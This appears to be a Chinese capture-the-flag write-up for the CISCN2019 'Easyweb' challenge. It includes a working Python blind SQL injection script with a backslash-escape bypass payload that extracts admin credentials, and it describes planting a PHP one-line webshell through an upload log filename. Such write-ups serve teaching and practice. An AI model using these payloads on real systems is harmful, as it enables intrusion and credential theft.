[CISCN2019 总决赛 Day2 Web1]Easyweb
查看rebots.txt,发现
然后结合抓包,只有image.php.bak存在,下载源码
经过审计
url/image.php?id=\\0&path= or 1=1 %23用这个可以绕过,
然后只需要改1=1部分的内容,在这里修改成sql语句,由于没有回显,所以选择盲注的方式
根据盲注内容写出脚本
根据盲注内容写出脚本
import requests
url = "http://7a12c30e-d57c-46ca-91c6-abce0efe22b1.node4.buuoj.cn//image.php?id=\\0&path="
#payload = "or id=if(ascii(substr((select username from users),{0},1))>{1},1,0)%23"
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
l = 1
r = 130
mid = (l + r)>>1
while(l<r):
payloads = payload.format(i,mid)
print(url+payloads)
html = requests.get(url+payloads)
if "JFIF" in html.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result+=chr(mid)
print(result)
admin
f8fc30370a70010c08e4
好家伙,我还在解md5,结果密码明文存储
任意上传一个文件是这样的
这里的上传文件日志是一个php后缀的文件,所以可以用短标签的方法写入一个与句话木马的文件名,访问日志文件使其当做php
解析
右边的就是存放这个一句话木马文件名的日志文件
蚁剑访问他